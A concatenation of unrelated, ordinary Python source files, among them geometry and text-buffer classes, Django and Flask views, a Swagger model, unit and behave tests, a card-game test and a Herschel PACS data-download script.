    def __init__(self, models=None):
        # A falsy argument (None or an empty sequence) starts a fresh list.
        self.models = models if models else []

    def add_model(self, model):
        """Append *model*, which must be a Polyhedron."""
        assert isinstance(model, Polyhedron)
        self.models.append(model)


class Line2D(object):
    def __init__(self, point1, point2):
        """
        Line through *point1* and *point2*, stored as the equation
        a*x + b*y + c = 0 normalized so that b >= 0.
        :param point1: starting point
        :param point2: ending point
        :return: a Line object
        """
        assert len(point1) == 2 and len(point2) == 2

        x1, y1 = point1[0], point1[1]
        x2, y2 = point2[0], point2[1]
        self.a = y2 - y1
        self.b = x1 - x2
        self.c = y1 * x2 - x1 * y2

        if self.b < 0:
            # Flip every coefficient to restore the b >= 0 invariant.
            self.a, self.b, self.c = -self.a, -self.b, -self.c

    def _evaluate(self, point):
        # Sign of a*x + b*y + c tells which side of the line the point is on.
        return self.a * point[0] + self.b * point[1] + self.c

    def is_point_on_left(self, point):
        return self._evaluate(point) > 0

    def is_point_on_right(self, point):
        return self._evaluate(point) < 0

    def is_point_on_line(self, point):
        return self._evaluate(point) == 0

    def get_y_from_x(self, x):
        """y such that (x, y) lies on the line; 0.0 when the line is vertical."""
        if self.b == 0:
            return 0.0

        return 1.0 * (-self.c - self.a * x) / self.b

    def get_x_from_y(self, y):
        """x such that (x, y) lies on the line; 0.0 when the line is horizontal."""
        if self.a == 0:
            return 0.0

        return 1.0 * (-self.c - self.b * y) / self.a

# coding: utf-8

"""
    ORCID Member

    No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)

    OpenAPI spec version: Latest
    
    Generated by: https://github.com/swagger-api/swagger-codegen.git
"""


from pprint import pformat
from six import iteritems
import re


class ContributorOrcid(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self, uri=None, path=None, host=None):
        """
        ContributorOrcid - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        # Attribute name -> declared Swagger type (all plain strings here).
        self.swagger_types = {
            'uri': 'str',
            'path': 'str',
            'host': 'str'
        }

        # Attribute name -> key used in the JSON wire format.
        self.attribute_map = {
            'uri': 'uri',
            'path': 'path',
            'host': 'host'
        }

        self._uri = uri
        self._path = path
        self._host = host

    @property
    def uri(self):
        """
        Gets the uri of this ContributorOrcid.

        :return: The uri of this ContributorOrcid.
        :rtype: str
        """
        return self._uri

    @uri.setter
    def uri(self, uri):
        """
        Sets the uri of this ContributorOrcid.

        :param uri: The uri of this ContributorOrcid.
        :type: str
        """

        self._uri = uri

    @property
    def path(self):
        """
        Gets the path of this ContributorOrcid.

        :return: The path of this ContributorOrcid.
        :rtype: str
        """
        return self._path

    @path.setter
    def path(self, path):
        """
        Sets the path of this ContributorOrcid.

        :param path: The path of this ContributorOrcid.
        :type: str
        """

        self._path = path

    @property
    def host(self):
        """
        Gets the host of this ContributorOrcid.

        :return: The host of this ContributorOrcid.
        :rtype: str
        """
        return self._host

    @host.setter
    def host(self, host):
        """
        Sets the host of this ContributorOrcid.

        :param host: The host of this ContributorOrcid.
        :type: str
        """

        self._host = host

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            # Recurse into lists, nested models, and dicts of models so the
            # whole object graph serializes to plain Python values.
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        if not isinstance(other, ContributorOrcid):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):
    # Initial migration: creates the Page table with a unique title and
    # slug, and a posted timestamp set on insert and indexed for lookups.

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Page',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(unique=True, max_length=150)),
                ('slug', models.SlugField(unique=True, max_length=150)),
                ('posted', models.DateTimeField(auto_now_add=True, db_index=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]

from behave import given, when, then
from genosdb.models import User
from genosdb.exceptions import UserNotFound

# 'mongodb://localhost:27017/')


@given('a valid user with values {username}, {password}, {email}, {first_name}, {last_name}')
def step_impl(context, username, password, email, first_name, last_name):
    # Build the user under test and stash it on the behave context for
    # the when/then steps that follow.
    context.base_user = User(username=username, email=email, password=password, first_name=first_name,
                        last_name=last_name)


@when('I add the user to the collection')
def step_impl(context):
    # Persist the user created in the given-step.
    context.user_service.save(context.base_user)


@then('I check {user_name} exists')
def step_impl(context, user_name):
    """Fetch the stored user and compare every field with the one we saved."""
    stored = context.user_service.exists(user_name)
    expected = context.base_user
    for field in ('username', 'password', 'email', 'first_name', 'last_name'):
        assert getattr(expected, field) == stored[field]
    assert stored['_id'] is not None

@given('I update {username} {field} with {value}')
def step_impl(context, username, field, value):
    # Look the user up first so we can fail loudly when it is missing.
    user = context.user_service.exists(username)

    if user is not None:
        # NOTE(review): the user is indexed like a dict here but serialized
        # via .to_json() below — confirm exists() returns an object that
        # supports both protocols.
        user[field] = value
        context.user_service.update(user.to_json())
    else:
        raise UserNotFound(username, "User was not found")





@then('I check {username} {field} is {value}')
def step_impl(context, username, field, value):
    """Assert the stored user's *field* equals *value*; raise if the user is missing."""
    found = context.user_service.exists(username)
    if found is None:
        raise UserNotFound(username, "User was not found")
    assert found[field] == value




import unittest
from src.data_structures.mockdata import MockData


class TestMockData (unittest.TestCase):
    """Unit tests for MockData."""

    def setUp(self):
        self.data = MockData()

    def test_random_data(self):
        # get_random_elements(n) must return exactly n elements.
        data = MockData()
        a_set = data.get_random_elements(10)
        self.assertTrue(len(a_set) == 10, "the data should have 10 elements!")


# The __main__ guard was previously indented inside the class body, which
# made it execute while the class was still being defined — i.e. before the
# test methods were registered — whenever the file ran as a script.
if __name__ == '__main__':
    unittest.main()
from rest_framework.filters import (
    FilterSet
)
from trialscompendium.trials.models import Treatment


class TreatmentListFilter(FilterSet):
    """
    Filter query list from treatment database table
    """
    class Meta:
        # Allowed lookup expressions per field when filtering Treatment rows.
        model = Treatment
        fields = {'id': ['exact', 'in'],
                  'no_replicate': ['exact', 'in', 'gte', 'lte'],
                  'nitrogen_treatment': ['iexact', 'in', 'icontains'],
                  'phosphate_treatment': ['iexact', 'in', 'icontains'],
                  'tillage_practice': ['iexact', 'in', 'icontains'],
                  'cropping_system': ['iexact', 'in', 'icontains'],
                  'crops_grown': ['iexact', 'in', 'icontains'],
                  'farm_yard_manure': ['iexact', 'in', 'icontains'],
                  'farm_residue': ['iexact', 'in', 'icontains'],
                  }
        # Default ordering applied to the filtered queryset.
        order_by = ['tillage_practice', 'cropping_system', 'crops_grown']

"""
WSGI config for Carkinos project.

It exposes the WSGI callable as a module-level variable named ``application``.

For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""

import os

from django.core.wsgi import get_wsgi_application

# Point Django at the project settings unless the environment already did.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Carkinos.settings")

# Module-level WSGI entry point used by the application server.
application = get_wsgi_application()

from io import BytesIO

from django import forms
from django.http import HttpResponse
from django.template import Context, Template

from braces.views import LoginRequiredMixin
from django.views.generic import DetailView, ListView
from django.views.decorators.http import require_http_methods

from django.contrib import messages
from django.shortcuts import render, redirect
from django.conf import settings

from reportlab.pdfgen.canvas import Canvas

from reportlab.lib.units import inch
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.pagesizes import letter, landscape

from reportlab.platypus import Spacer
from reportlab.platypus import Frame
from reportlab.platypus import Paragraph
from reportlab.platypus import PageTemplate
from reportlab.platypus import BaseDocTemplate

from environ import Env

from members.models import Member


@require_http_methods(['GET', 'POST'])
def member_list(request):
    """Password-gate the member list.

    POST: validate the submitted shared password against MEMBERS_PASSWORD
    and remember it in the session. GET (or failed POST): show the list if
    the session already holds the right password, otherwise render the
    password form.
    """
    env = Env()
    MEMBERS_PASSWORD = env('MEMBERS_PASSWORD')

    # handle form submission — check the HTTP method rather than the
    # truthiness of request.POST (an empty POST body is falsy and would
    # previously have skipped this branch)
    if request.method == 'POST':
        pw_form = PasswordForm(request.POST)

        if pw_form.is_valid() and pw_form.cleaned_data['password'] == MEMBERS_PASSWORD:
            request.session['password'] = pw_form.cleaned_data['password']
            return redirect('members:member_list')

        messages.error(request, "The password you entered was incorrect, please try again.")

    # form not being submitted, check password
    if (request.session.get('password') and request.session['password'] == MEMBERS_PASSWORD):
        member_list = Member.objects.all()
        return render(request, 'members/member_list.html', {
            'member_list': member_list,
        })

    # password missing or wrong: render the password form
    pw_form = PasswordForm()
    return render(request, 'members/members_password_form.html', {
        'pw_form': pw_form,
    })


class PasswordForm(forms.Form):
    # Single shared password, rendered as a Bootstrap-styled password input.
    password = forms.CharField(max_length=20,
        widget=forms.PasswordInput(attrs={
            'class': 'form-control',
            'placeholder': 'Enter Password',
    }))


def build_frames(pwidth, pheight, ncols):
    """Build *ncols* equal-width reportlab Frames spanning the page.

    Every frame gets a visible boundary except the first and the last.
    (The original hard-coded frames[0] and frames[3], which matched the
    intent only for ncols == 4 and raised IndexError for fewer columns.)

    :param pwidth: page width in points
    :param pheight: page height in points
    :param ncols: number of columns
    :return: list of Frame objects
    """
    col_width = (pwidth - 30) / ncols
    frames = []
    for i in range(ncols):
        f = Frame(x1=(i * col_width + 15),
                  y1=0,
                  width=col_width,
                  height=pheight + 2,
                  leftPadding=15,
                  rightPadding=15,
                  topPadding=15,
                  bottomPadding=15,
                  showBoundary=True)
        frames.append(f)
    frames[0].showBoundary = False
    frames[-1].showBoundary = False
    return frames

def member_list_pdf(request):
    """Render every Member as a styled paragraph and stream the result as a
    four-column landscape PDF attachment named memberlist.pdf."""
    response = HttpResponse(content_type='application/pdf')
    response['Content-Disposition'] = 'attachment; filename="memberlist.pdf"'

    buffer = BytesIO()

    NCOLUMNS = 4
    PAGE_WIDTH, PAGE_HEIGHT = landscape(letter)

    styles = getSampleStyleSheet()

    # One page template whose frames define the column layout.
    ptemplate = PageTemplate(frames=build_frames(PAGE_WIDTH, PAGE_HEIGHT, NCOLUMNS))
    doc = BaseDocTemplate(
        filename=buffer,
        pagesize=landscape(letter),
        pageTemplates=[ptemplate],
        showBoundary=0,
        leftMargin=inch,
        rightMargin=inch,
        topMargin=inch,
        bottomMargin=inch,
        allowSplitting=0,
        title='SSIP209 Members Listing',
        author='Max Shkurygin',
        _pageBreakQuick=1,
        encrypt=None)

    # Django template producing the per-member paragraph markup that
    # reportlab's Paragraph understands (font/br tags).
    template = Template("""
<font size="14"><strong>{{ member.last_name }}, {{ member.first_name }}</strong></font>
<br/>

{% if member.address or member.town %}
    {{ member.address }}<br/>
    {% if member.town %} {{ member.town }} NY <br/>{% endif %}
{% endif %}

{% if member.homephone %}
(Home) {{ member.homephone }}
<br/>
{% endif %}

{% if member.cellphone %}
(Cell) {{ member.cellphone }}
<br/>
{% endif %}

{% if member.email %}
Email: {{ member.email }}
<br/>
{% endif %}

{% if member.hobbies %}
<strong>My Hobbies</strong>: {{ member.hobbies }}
<br/>
{% endif %}

{% if member.canhelp %}
<strong>I can help with</strong>: {{ member.canhelp }}
<br/>
{% endif %}

{% if member.needhelp %}
<strong>I could use help with</strong>: {{ member.needhelp }}
<br/>
{% endif %}
""")

    # One paragraph + spacer per member, flowed through the column frames.
    content = []
    for member in Member.objects.all():
        context = Context({"member": member})
        p = Paragraph(template.render(context), styles["Normal"])
        content.append(p)
        content.append(Spacer(1, 0.3*inch))

    doc.build(content)

    # Hand the rendered PDF bytes to the HTTP response.
    pdf = buffer.getvalue()
    buffer.close()
    response.write(pdf)
    return response


import time
import multiprocessing
from flask import Flask

app = Flask(__name__)
backProc = None

def testFun():
    """Background worker: print a heartbeat forever, napping 3 s between lines."""
    print('Starting')
    messages = ('looping', '3 Seconds Later')
    while True:
        for msg in messages:
            time.sleep(3)
            print(msg)

@app.route('/')
def root():
    """Report the tracked background process's PID and liveness.

    Guard against backProc still being None (before /start has been hit);
    the original raised AttributeError and returned HTTP 500 in that case.
    """
    if backProc is None:
        return 'No background process started yet - hit /start first'
    return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())

@app.route('/kill')
def kill():
    # Terminate the single tracked background process.
    backProc.terminate()
    return 'killed: ' + str(backProc.pid)

@app.route('/kill_all')
def kill_all():
    """Terminate every live child process of this server."""
    for child in multiprocessing.active_children():
        child.terminate()
    return 'killed all'

@app.route('/active')
def active():
    """List the PIDs of all live child processes (also printed to stdout)."""
    pids = [child.pid for child in multiprocessing.active_children()]
    for pid in pids:
        print(pid)

    return str(pids)

@app.route('/start')
def start():
    # Spawn the worker as a daemon so it dies with the server process,
    # and remember it in the module-level handle used by /, /kill.
    global backProc
    backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
    backProc.start()
    return 'started: ' + str(backProc.pid)

if __name__ == '__main__':
    app.run()

'''
Created by auto_sdk on 2014-12-17 17:22:51
'''
from top.api.base import RestApi
class SubusersGetRequest(RestApi):
    """Request object for the taobao.subusers.get TOP API."""

    def __init__(self, domain='gw.api.taobao.com', port=80):
        RestApi.__init__(self, domain, port)
        # Nick of the account whose sub-users are listed.
        self.user_nick = None

    def getapiname(self):
        """Return the TOP API method name."""
        return 'taobao.subusers.get'

# coding: utf-8

import unittest

from config_reader import ConfigReader

class TestConfigReader(unittest.TestCase):
    # Exercises ConfigReader against a small fixed XML document containing
    # two <person> entries.

    def setUp(self):
        # Fresh reader over the XML fixture for every test.
        self.config = ConfigReader("""
            <root>
                <person>
                    <name>山田</name>
                    <age>15</age>
                </person>
                <person>
                    <name>佐藤</name>
                    <age>43</age>
                </person>
            </root>
            """)


    def test_get_names(self):
        # Names come back in document order.
        self.assertEqual(self.config.get_names(), ['山田', '佐藤'])

    def test_get_ages(self):
        # Ages are returned as strings, not ints.
        self.assertEqual(self.config.get_ages(), ['15', '43'])

# project/server/tests/test_user.py


import datetime
import unittest

from flask_login import current_user

from base import BaseTestCase
from project.server import bcrypt
from project.server.models import User
from project.server.user.forms import LoginForm


class TestUserBlueprint(BaseTestCase):
    """Integration tests for the user blueprint: login, logout,
    registration, and access control on protected routes."""

    def test_correct_login(self):
        # Ensure login behaves correctly with correct credentials.
        with self.client:
            response = self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="admin_user"),
                follow_redirects=True,
            )
            self.assertIn(b"Welcome", response.data)
            self.assertIn(b"Logout", response.data)
            self.assertIn(b"Members", response.data)
            self.assertTrue(current_user.email == "ad@min.com")
            self.assertTrue(current_user.is_active())
            self.assertEqual(response.status_code, 200)

    def test_logout_behaves_correctly(self):
        # Ensure logout behaves correctly - regarding the session.
        with self.client:
            self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="admin_user"),
                follow_redirects=True,
            )
            response = self.client.get("/logout", follow_redirects=True)
            self.assertIn(b"You were logged out. Bye!", response.data)
            # NOTE(review): is_active is not called here although it is
            # called as a method elsewhere in this class — confirm which
            # flask-login API (property vs method) this project targets.
            self.assertFalse(current_user.is_active)

    def test_logout_route_requires_login(self):
        # Ensure logout route requres logged in user.
        response = self.client.get("/logout", follow_redirects=True)
        self.assertIn(b"Please log in to access this page", response.data)

    def test_member_route_requires_login(self):
        # Ensure member route requres logged in user.
        response = self.client.get("/members", follow_redirects=True)
        self.assertIn(b"Please log in to access this page", response.data)

    def test_validate_success_login_form(self):
        # Ensure correct data validates.
        form = LoginForm(email="ad@min.com", password="admin_user")
        self.assertTrue(form.validate())

    def test_validate_invalid_email_format(self):
        # Ensure invalid email format throws error.
        form = LoginForm(email="unknown", password="example")
        self.assertFalse(form.validate())

    def test_get_by_id(self):
        # Ensure id is correct for the current/logged in user.
        with self.client:
            self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="admin_user"),
                follow_redirects=True,
            )
            self.assertTrue(current_user.id == 1)

    def test_registered_on_defaults_to_datetime(self):
        # Ensure that registered_on is a datetime.
        with self.client:
            self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="admin_user"),
                follow_redirects=True,
            )
            user = User.query.filter_by(email="ad@min.com").first()
            self.assertIsInstance(user.registered_on, datetime.datetime)

    def test_check_password(self):
        # Ensure given password is correct after unhashing.
        user = User.query.filter_by(email="ad@min.com").first()
        self.assertTrue(
            bcrypt.check_password_hash(user.password, "admin_user")
        )
        self.assertFalse(bcrypt.check_password_hash(user.password, "foobar"))

    def test_validate_invalid_password(self):
        # Ensure user can't login when the pasword is incorrect.
        with self.client:
            response = self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="foo_bar"),
                follow_redirects=True,
            )
        self.assertIn(b"Invalid email and/or password.", response.data)

    def test_register_route(self):
        # Ensure about route behaves correctly.
        response = self.client.get("/register", follow_redirects=True)
        self.assertIn(b"<h1>Register</h1>\n", response.data)

    def test_user_registration(self):
        # Ensure registration behaves correctlys.
        with self.client:
            response = self.client.post(
                "/register",
                data=dict(
                    email="test@tester.com",
                    password="testing",
                    confirm="testing",
                ),
                follow_redirects=True,
            )
            self.assertIn(b"Welcome", response.data)
            self.assertTrue(current_user.email == "test@tester.com")
            self.assertTrue(current_user.is_active())
            self.assertEqual(response.status_code, 200)


if __name__ == "__main__":
    unittest.main()

# PEP 8 (E731): prefer a named def over assigning a lambda to a name.
def inside(x, y):
    """True when (x, y) lies inside or on the ellipse 4x^2 + y^2 = 100."""
    return 4*x*x + y*y <= 100

def coll(sx, sy, dx, dy):
    """Advance from (sx, sy) along (dx, dy) to the boundary.

    Binary-searches (32 halving steps) the largest multiplier m for which
    the point is still inside, then returns (sx + dx*m, sy + dy*m).
    """
    m = 0.0
    step = 1.0
    for _ in range(32):
        trial = m + step
        if inside(sx + dx * trial, sy + dy * trial):
            m = trial
        step /= 2
    return (sx + dx * m, sy + dy * m)

def norm(x, y):
    """Return (x, y) scaled to unit length."""
    length = (x * x + y * y) ** 0.5
    return (x / length, y / length)

# Fire a ray from (0, 10.1) in direction (1.4, -19.7) and bounce it around
# the inside of the ellipse 4x^2 + y^2 = 100 (see inside()), counting
# reflections until it escapes upward through the gap |x| <= 0.01.
# NOTE(review): this looks like the classic "laser in an elliptical white
# cell" puzzle — confirm before relying on that interpretation.
sx, sy = 0, 10.1
dx, dy = 1.4, -19.7

for I in range(999):
    sx, sy = coll(sx, sy, dx, dy)
    if sy > 0 and abs(sx) <= 0.01:
        print(I)
        break
    # Unit tangent at the hit point: the gradient of 4x^2 + y^2 is (8x, 2y),
    # so (1, -4x/y) is orthogonal to it.
    mx, my = norm(1, -4*sx/sy)
    # Reflect the direction vector about the (mx, my) axis.
    d = mx*dx + my*dy
    dx, dy = -dx + 2 * mx * d, -dy + 2 * my * d

import sys

MAX_NUM_STORED_LINES = 200
MAX_NUM_LINES = 10
LINEWIDTH = 80

class CmdText(object):
    """
    Represents a command line text device. Text is split into lines
    corresponding to the linewidth of the device.
    """
    def __init__(self):
        """
        Construct empty object.
        """
        self.num_lines = 0                      # count of stored wrapped lines
        self.remaining_lines = MAX_NUM_LINES    # kept for backward compatibility
        self.lines = []                         # stored lines, oldest first

    def insert(self, string):
        """
        Insert string at the end. This always begins a new line; the string
        is wrapped to LINEWIDTH columns first.
        """
        # The old guard `if num_lines >= MAX_NUM_LINES: pass` was dead code,
        # and the slice new_lines[-num:] always kept every line (num_lines()
        # never returns less than len(get_lines())), so both were removed.
        self.lines += get_lines(string)
        self.update_num_lines()

    def merge_after(self, obj):
        """
        Merge with another CmdText object by appending the input object's
        content.

        Bug fix: the previous body was the bare expression ``self.lines``,
        which did nothing.
        """
        self.lines += obj.lines
        self.update_num_lines()

    def strip_lines(self):
        """
        Remove excessive number of lines. This deletes the oldest half.

        Bug fix: the old ``pop(i)`` loop removed every *other* line (indices
        shift after each pop) and never refreshed ``num_lines``.
        """
        if self.num_lines > MAX_NUM_STORED_LINES:
            del self.lines[:MAX_NUM_STORED_LINES // 2]
            self.update_num_lines()

    def update_num_lines(self):
        """
        Update the number of lines member.
        """
        self.num_lines = len(self.lines)

    def get_line(self, n):
        """
        Return the line with index n; raise IndexError when out of range.
        """
        if n < self.num_lines:
            return self.lines[n]
        else:
            raise IndexError("Line index out of range.")

    def print_screen(self):
        """
        Return the MAX_NUM_LINES most recent lines.
        """
        return self.lines[-MAX_NUM_LINES:]

    def __iter__(self):
        """
        Iterate over the stored lines, oldest first.
        """
        return iter(self.lines)

    def __getitem__(self, ind):
        # Delegate indexing/slicing straight to the underlying list.
        return self.lines[ind]

def num_lines(string):
    """
    Return the number of device lines ``string`` occupies after wrapping.

    Each newline-separated segment takes ``len(segment) // LINEWIDTH + 1``
    wrapped lines — exactly the number of chunks get_lines() produces for it.

    Bug fix: the old loop added ``len(string) // LINEWIDTH + 1`` per segment
    (measuring the whole string instead of the segment) on top of an initial
    ``len(line_list)``, so it systematically overcounted.
    """
    return sum(len(line) // LINEWIDTH + 1 for line in string.split("\n"))


def get_lines(string):
    """
    Return the list of device lines extracted from ``string``: split at
    newlines, then wrap each segment to LINEWIDTH columns.  A segment whose
    length is an exact multiple of LINEWIDTH yields a trailing empty chunk
    (the ``// LINEWIDTH + 1`` formula), mirroring num_lines().
    """
    wrapped = []
    for segment in string.split('\n'):
        chunk_count = len(segment) // LINEWIDTH + 1
        for k in range(chunk_count):
            wrapped.append(segment[k * LINEWIDTH:(k + 1) * LINEWIDTH])
    return wrapped

class Command(CmdText):
    """A CmdText holding one issued command, optionally linked to its response."""

    def __init__(self, string, rind=None):
        CmdText.__init__(self)
        self.insert(string)
        if rind is not None:
            # Index of the associated Response object.
            self.response = rind
    

class Response(CmdText):
    """A CmdText holding one command response, optionally linked to its command."""

    def __init__(self, string, cind=None):
        CmdText.__init__(self)
        self.insert(string)
        if cind is not None:
            # Index of the associated Command object.
            self.command = cind


class TestCase(object):
    """
    Base class for tests.  Subclasses define no-argument functions whose
    names start with 'test'; run() invokes them and reports progress.
    """

    @classmethod
    def run(cls):
        """
        Runs all tests (methods which begin with 'test').

        Each test is invoked without arguments; the first failure propagates
        to the caller unchanged.
        """
        # Pad the progress dots so the status column lines up.
        max_len = max(len(name) for name in cls.__dict__)
        for key in cls.__dict__:
            if key.startswith("test"):
                fill = max_len - len(key)
                sys.stdout.write("Testing {} ...{} ".format(key, '.' * fill))
                # The old try/except: raise/else wrapper was a no-op: a bare
                # re-raise is identical to letting the exception propagate.
                cls.__dict__[key]()
                print("Test passed!")
        print("All tests passed!")


class StaticTest(TestCase):
    """
    Tests for the module-level helper functions.

    NOTE: the test methods deliberately take no ``self`` — TestCase.run()
    pulls them out of the class dict and calls them as plain functions.
    """

    def test_get_lines_with_empty_string():
        assert get_lines("") == [""]

    def test_get_lines_with_short_string():
        assert len(get_lines("a" * (LINEWIDTH - 1))) == 1

    def test_get_lines_with_long_string():
        assert len(get_lines("a" * (2 * LINEWIDTH - 1))) == 2

    def test_get_lines_with_very_long_string():
        assert len(get_lines("a" * (4 * LINEWIDTH - 1))) == 4

    def test_get_lines_with_long_text_string():
        text = ("This is a test string, which should simulate real text. The command should"
                " correctly split this text into two lines.")
        LINEWIDTH = 80  # local shadow of the module constant (same value)
        correct_lines = [text[:LINEWIDTH], text[LINEWIDTH:]]
        assert len(get_lines(text)) == len(text) // LINEWIDTH + 1
        assert get_lines(text) == correct_lines
    


class CmdTextTest(object):
    """
    Tests for CmdText class methods.
    """
    # TODO: no CmdText tests implemented yet; this is a placeholder.
    pass
"""
Tests for a door card.
"""

import pytest

from onirim import card
from onirim import component
from onirim import core
from onirim import agent


class DoorActor(agent.Actor):
    """
    Actor stub whose door-opening decision is fixed at construction time.
    """
    def __init__(self, do_open):
        # Value returned by every open_door() call.
        self._do_open = do_open

    def open_door(self, content, door_card):
        # Always answer with the preconfigured decision; arguments ignored.
        return self._do_open


# Each case is (door color, actor's open decision, content before drawing,
# expected content after drawing).

# No matching key in hand: the door goes to limbo regardless of the decision.
DRAWN_CAN_NOT_OPEN = (
    card.Color.red,
    False,
    component.Content(
        undrawn_cards=[],
        hand=[card.key(card.Color.blue)]),
    component.Content(
        undrawn_cards=[],
        hand=[card.key(card.Color.blue)],
        limbo=[card.door(card.Color.red)]),
    )

# Matching key in hand but the actor declines: the door still goes to limbo.
DRAWN_DO_NOT_OPEN = (
    card.Color.red,
    False,
    component.Content(
        undrawn_cards=[],
        hand=[card.key(card.Color.red)]),
    component.Content(
        undrawn_cards=[],
        hand=[card.key(card.Color.red)],
        limbo=[card.door(card.Color.red)]),
    )

# Actor opens: one matching key is discarded and the door is opened.
DRAWN_DO_OPEN = (
    card.Color.red,
    True,
    component.Content(
        undrawn_cards=[],
        hand=[
            card.key(card.Color.red),
            card.key(card.Color.red),
            card.key(card.Color.red),
        ]),
    component.Content(
        undrawn_cards=[],
        discarded=[card.key(card.Color.red)],
        hand=[card.key(card.Color.red), card.key(card.Color.red)],
        opened=[card.door(card.Color.red)]),
    )

# Actor opens: only the matching-color key is spent, other colors stay.
DRAWN_DO_OPEN_2 = (
    card.Color.red,
    True,
    component.Content(
        undrawn_cards=[],
        hand=[
            card.key(card.Color.blue),
            card.key(card.Color.red),
        ]),
    component.Content(
        undrawn_cards=[],
        discarded=[card.key(card.Color.red)],
        hand=[card.key(card.Color.blue)],
        opened=[card.door(card.Color.red)]),
    )

DRAWN_CASES = [
    DRAWN_CAN_NOT_OPEN,
    DRAWN_DO_NOT_OPEN,
    DRAWN_DO_OPEN,
    DRAWN_DO_OPEN_2,
    ]


@pytest.mark.parametrize(
    "color, do_open, content, content_after",
    DRAWN_CASES)
def test_drawn(color, do_open, content, content_after):
    """Drawing a door card must transform the content as each case expects."""
    door_card = card.door(color)
    door_card.drawn(core.Core(DoorActor(do_open), agent.Observer(), content))
    # Content is mutated in place by the draw.
    assert content == content_after

### This script fetches level-1 PACS imaging data, using a list generated by the
### archive (in the CSV format), attaches sky coordinates and masks to them
### (by calling the convertL1ToScanam task) and save them to disk in the correct
### format for later use by Scanamorphos.
### See important instructions below.


#######################################################

### This script is part of the Scanamorphos package.

###  HCSS is free software: you can redistribute it and/or modify
###  it under the terms of the GNU Lesser General Public License as
###  published by the Free Software Foundation, either version 3 of
###  the License, or (at your option) any later version.

#######################################################

## Import classes and definitions:
import os
from herschel.pacs.spg.phot import ConvertL1ToScanamTask

#######################################################


## local settings:

# Root of the local Scanamorphos working tree; level-1 products live in L1/.
dir_root = "/pcdisk/stark/aribas/Desktop/modeling_TDs/remaps_Cha/PACS/scanamorphos/"
path = dir_root +"L1/"

### number of observations:
# Number of rows of results.csv to process below.
n_obs = 2


#######################################################

## Do a multiple target search in the archive and use the "save all results as CSV" option.
## --> ascii table 'results.csv' where lines can be edited
## (suppress unwanted observations and correct target names)

## Create the directories contained in the dir_out variables (l. 57)
## before running this script.

#######################################################


## observations:
# NOTE(review): asciiTableReader is an HCSS/HIPE builtin available only
# inside the Herschel environment; columns 0 and 1 are obsid and target name.
table_obs = asciiTableReader(file=dir_root+'results_fast.csv', tableType='CSV', skipRows=1)
list_obsids = table_obs[0].data
list_names = table_obs[1].data


# NOTE(review): this is Jython 2.x / HIPE code (print statement, backtick
# repr); it will not run under CPython 3.
for i_obs in range(n_obs):
    ##
    num_obsid = list_obsids[i_obs]
    source = list_names[i_obs]
    source = str.lower(str(source))
    # Per-source output directory for the converted frames.
    dir_out = path+source+"_processed_obsids"
    # create directory if it does not exist
    if not(os.path.exists(dir_out)):
        os.system('mkdir '+dir_out)
    ##
    print ""
    print "Downloading obsid " + `num_obsid`
    obs = getObservation(num_obsid, useHsa=True, instrument="PACS", verbose=True)
    ### red photometer level-1 frames
    frames = obs.level1.refs["HPPAVGR"].product.refs[0].product
    convertL1ToScanam(frames, cancelGlitch=1, assignRaDec=1, outDir=dir_out)
    ### blue photometer level-1 frames
    frames = obs.level1.refs["HPPAVGB"].product.refs[0].product
    convertL1ToScanam(frames, cancelGlitch=1, assignRaDec=1, outDir=dir_out)


### END OF SCRIPT

#######################################################

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os
from conans.model import Generator
from conans.client.generators import VisualStudioGenerator
from xml.dom import minidom
from conans.util.files import load


class VisualStudioMultiGenerator(Generator):
    """Conan generator emitting a multi-configuration Visual Studio property
    sheet (conanbuildinfo_multi.props) that dispatches, via MSBuild
    conditions, to one per-configuration .props file produced by the plain
    VisualStudioGenerator."""

    # Skeleton written the first time; later runs append <Import> nodes to it.
    template = """<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
    <ImportGroup Label="PropertySheets" >
    </ImportGroup>
    <PropertyGroup Label="UserMacros" />
    <PropertyGroup />
    <ItemDefinitionGroup />
    <ItemGroup />
</Project>
"""

    @property
    def filename(self):
        # Multiple files are produced, so the single-filename hook is unused.
        pass

    @property
    def content(self):
        configuration = str(self.conanfile.settings.build_type)
        platform = {'x86': 'Win32', 'x86_64': 'x64'}.get(str(self.conanfile.settings.arch))
        # Bug fix: settings live on the conanfile, not on the generator
        # itself — every other access here already goes through
        # self.conanfile.settings.
